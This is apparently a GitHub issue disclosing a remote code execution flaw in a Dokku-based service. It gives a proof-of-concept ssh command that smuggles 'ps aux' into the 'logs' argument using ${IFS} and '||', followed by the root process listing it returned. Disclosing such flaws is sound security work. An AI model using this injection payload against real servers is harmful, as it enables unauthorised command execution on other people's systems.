RCE
overjt opened this issue · 1 comments
overjt commented
The system is vulnerable to remote code execution.
POC
ssh dokku@HOST logs GITHUBUSERHASHED-PROJECTNAME "-n${IFS}2||${IFS}ps${IFS}aux${IFS}||echo"
Response
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 57816 7708 ? Ss Feb08 14:38 /lib/systemd/systemd --system --deserialize 25
root 2 0.0 0.0 0 0 ? S Feb08 0:04 [kthreadd]
root 3 0.0 0.0 0 0 ? S Feb08 10:48 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< Feb08 0:00 [kworker/0:0H]
root 7 0.0 0.0 0 0 ? S Feb08 101:17 [rcu_sched]
root 8 0.0 0.0 0 0 ? S Feb08 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S Feb08 14:45 [migration/0]
root 10 0.0 0.0 0 0 ? S< Feb08 0:00 [lru-add-drain]
root 11 0.0 0.0 0 0 ? S Feb08 0:55 [watchdog/0]
root 12 0.0 0.0 0 0 ? S Feb08 0:00 [cpuhp/0]
root 13 0.0 0.0 0 0 ? S Feb08 0:00 [cpuhp/1]
root 14 0.0 0.0 0 0 ? S Feb08 0:46 [watchdog/1]
root 15 0.0 0.0 0 0 ? S Feb08 14:21 [migration/1]
root 16 0.0 0.0 0 0 ? S Feb08 0:59 [ksoftirqd/1]
root 18 0.0 0.0 0 0 ? S< Feb08 0:00 [kworker/1:0H]
root 19 0.0 0.0 0 0 ? S Feb08 0:00 [kdevtmpfs]
root 20 0.0 0.0 0 0 ? S< Feb08 0:00 [netns]
root 21 0.0 0.0 0 0 ? S Feb08 1:25 [khungtaskd]
root 22 0.0 0.0 0 0 ? S Feb08 0:00 [oom_reaper]
root 23 0.0 0.0 0 0 ? S< Feb08 0:00 [writeback]
...